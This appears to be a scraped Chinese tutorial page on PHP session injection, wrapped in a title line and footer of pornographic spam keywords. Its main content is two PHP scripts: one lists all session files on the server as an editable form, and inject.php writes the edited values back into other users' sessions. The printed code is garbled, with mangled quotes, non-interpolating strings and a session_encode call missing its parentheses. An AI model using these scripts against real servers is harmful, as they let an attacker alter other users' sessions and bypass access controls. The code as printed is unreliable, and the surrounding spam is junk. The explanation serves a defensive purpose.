国产成人精品久久免费动漫-国产成人精品天堂-国产成人精品区在线观看-国产成人精品日本-a级毛片无码免费真人-a级毛片毛片免费观看久潮喷

您的位置:首頁技術文章
文章詳情頁

PHP安全-會話注入

瀏覽:92日期:2022-09-11 18:05:06
會話注入

一個與會話暴露類似的問題是會話注入。此類攻擊是基于你的WEB服務器除了對會話存儲目錄有讀取權限外,還有寫入權限。因此,存在著編寫一段允許其他用戶添加,編輯或刪除會話的腳本的可能。下例顯示了一個允許用戶方便地編輯已存在的會話數據的HTML表單:

<?php

session_start();

?>

<form action='inject.php' method='POST'>

<?php

$path = ini_get(’session.save_path’);

$handle = dir($path);

while ($filename = $handle->read())

{

if (substr($filename, 0, 5) == ’sess_’)

{

$sess_data = file_get_contents('$path/$filename');

if (!empty($sess_data))

{

session_decode($sess_data);

$sess_data = $_SESSION;

$_SESSION = array();

$sess_name = substr($filename, 5);

$sess_name = htmlentities($sess_name, ENT_QUOTES, ’UTF-8’);

echo '<h1>Session [$sess_name]</h1>';

foreach ($sess_data as $name => $value)

{

$name = htmlentities($name, ENT_QUOTES, ’UTF-8’);

$value = htmlentities($value, ENT_QUOTES, ’UTF-8’);

echo '<p>

$name:

<input type='text'

name='{$sess_name}[{$name}]'

value='$value' />

</p>';

}

echo ’<br />’;

}

}

}

$handle->close();

?>

<input type='submit' />

</form>

腳本inject.php執行由表單所指定的修改:

<?php

session_start();

$path = ini_get(’session.save_path’);

foreach ($_POST as $sess_name => $sess_data)

{

$_SESSION = $sess_data;

$sess_data = session_encode;

file_put_contents('$path/$sess_name', $sess_data);

}

$_SESSION = array();

?>

此類攻擊非常危險。攻擊者不僅可以編輯你的用戶的數據,還可以編輯他自己的會話數據。它比會話劫持更為強大,因為攻擊者能選擇所有的會話數據進行修改,從而使繞過訪問限制和其他安全手段成為可能。

針對這個問題的最好解決方案是將會話數據保存在數據庫中。參見前節所示。

標簽: PHP
相關文章:
主站蜘蛛池模板: 日韩欧美久久一区二区 | 亚洲一区二区精品推荐 | 国产精品综合一区二区 | 国产真实女人一级毛片 | 日本视频在线免费播放 | 美国一级毛片a | 成人免费在线观看视频 | 久久tv免费国产高清 | 欧美在线日韩在线 | 欧美一区=区三区 | 99精品久久99久久久久 | 欧美精品18videos性欧美 | 久久久久88色偷偷免费 | 成人国产第一区在线观看 | 亚洲精品日本 | 日本黄色美女网站 | 成人性生免费视频 | 在线午夜影院 | 欧美大尺度xxxxx视频 | 亚洲天堂网在线观看 | 免费一区二区三区久久 | 亚洲精品日韩专区在线观看 | 男女国产一级毛片 | 亚洲午夜在线播放 | 国产高清专区 | 亚洲人成免费网站 | 久久亚洲国产成人影院 | 国产在线小视频 | 亚洲一区浅井舞香在线播放 | 一级女性黄 色生活片 | 国产成人不卡亚洲精品91 | 亚洲精品成人7777在线观看 | 玖玖精品在线视频 | 成人午夜久久精品 | 欧美一级片在线观看 | 欧美videos另类齐全 | 综合在线亚洲 | 毛片网站在线看 | 又黄又爽视频好爽视频 | 国产成人99久久亚洲综合精品 | 欧美精品成人一区二区在线观看 |